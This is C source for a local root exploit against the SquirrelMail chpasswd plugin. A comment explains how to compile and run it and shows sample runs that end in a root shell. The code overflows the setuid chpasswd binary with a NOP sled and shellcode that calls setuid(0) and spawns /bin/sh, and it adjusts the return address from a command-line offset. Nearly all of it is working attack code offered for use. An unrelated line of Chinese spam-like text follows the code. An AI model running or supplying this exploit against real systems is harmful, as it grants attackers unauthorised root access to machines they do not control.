/* sq-chpass-exp.c Squirrelmail chpasswd local root exploit by deadcraft Bug founded by Matias Neiff Should work with only full path to chpasswd specified, but if isn't You can simply move RET address by adding second parameter, for example: compilation: gcc -o sq-chpass-exp sq-chpass-exp.c ./sq-chpass-exp /path/to/chpasswd 100 RET = 0xbffff8bc OFFSET = 0xbffff8e8 You forgot the New password. Illegal instruction deadcraft@dns:~/change_passwd$ ./sq-chpass-exp /path/to/chpasswd 700 RET = 0xbffffb14 OFFSET = 0xbffffb40 You forgot the New password. sh-2.05a# greetz to Bucz, evilcat and all friends ;) */ #include #include #define SIZE 150 #define SIZE2 500 char shellcode[]= "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50" "\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0" "\xb0\x01\xcd\x80"; unsigned long get_esp() { __asm__ ("movl %esp,%eax"); } int main(int argc, char *argv[]) { int offset, ret, i; char buf1[SIZE], buf2[SIZE2]; memset(buf2, 0x90, sizeof(buf2)-strlen(shellcode)-8); memcpy(buf2 + sizeof(buf2)-strlen(shellcode)-8 , shellcode, sizeof(shellcode)); if ((argc != 3) && (argc != 2)) { printf("Usage: %s full path to chpasswd\n",argv[0]); exit(0); } if (argc==3) { offset=atoi(argv[2]); ret=get_esp()+offset-strlen(shellcode)-strlen(argv[1]); printf("OFFSET = 0x%x\n", get_esp() + offset); } else ret = 0xbffffb14; printf("RET = 0x%x\n",ret); for(i=0; i < SIZE; i+=4) { * (long *) &buf1[i] = ret; } execl(argv[1],"chpasswd",buf1, buf2,0); return 0; }

亚洲欧美在线